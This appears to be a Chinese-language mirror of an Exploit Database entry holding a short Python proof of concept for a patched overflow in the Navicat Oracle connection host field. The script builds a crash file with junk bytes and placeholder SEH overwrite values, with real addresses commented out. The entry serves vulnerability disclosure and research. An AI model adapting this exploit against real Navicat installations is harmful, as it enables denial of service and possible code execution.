Navicat < 12.0.27 - Oracle Connection Overflow

Exploit Database
19 阅读

作者： Kevin McGuigan

日期： 2018-04-30
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/44558/

#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 27/04/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.


# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. 
filename="navicatPOC.txt"
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

last Exploits
Navicat < 12.0.27 - Oracle Connection Overflow的更多信息

Adobe Flash TextField.gridFitType Setter – Use-After-Free：
SQL Server Password Changer 1.90 – Denial of Service：
Media Player Classic 1.3.1774.0 – mpcpl Local Denial of Service (PoC)：
PHP Hosting Directory 2.0 – Database Disclosure：
Wireshark CAPWAP Dissector – Denial of Service (Metasploit)：
RealPlayer 15.0.6.14.3gp – Crash (PoC)：
Microsoft Windows 7/2008 R2 – SMB Client Trans2 Stack Overflow (MS10-020) (PoC)：
Seafile-server 3.1.5 – Remote Denial of Service：